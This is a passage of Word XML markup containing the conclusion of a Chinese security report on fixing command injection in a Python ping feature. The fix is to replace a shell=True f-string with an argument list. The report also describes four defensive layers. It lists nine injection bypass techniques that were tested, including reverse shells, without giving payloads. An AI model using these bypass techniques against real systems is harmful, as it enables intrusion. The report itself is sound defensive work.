          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 这个参数——它让 subprocess 将字符串交给 /bin/sh 解释执行，使分号、管道、反引号等 shell 元字符具备了"代码执行"能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">修复命令注入最关键的改动只有：将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>f"ping -c 3 {ip}"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 改为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>["ping", "-c", "3", ip]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，将 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>shell=True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 删除。这一改直接切断了攻击面——subprocess 直接执行 ping 程序，用户输入只是 argv[3]，无论是否包含 ;、| 等字符，shell 都不参与解释。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>但单靠"不要用 shell=True"是不够的，它依赖开发者的安全意识。本系统采用四层纵深防御：CSRF 防跨站触发、去 shell 防直接利用、白名单做二次校验、DNS 预解析提前拒止。即使某一层失效，后续防线仍然能够兜底。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>九类命令注入绕过手法（分号、管道、&amp;&amp;、||、反引号、$()、换行符、参数注入、反弹 Shell）的验证过程表明，命令注入的绕过方式远比想象中丰富。只有白名单 + 正确使用 API 的组合才能实现真正的防御。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="999999"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>— 报告结束 —</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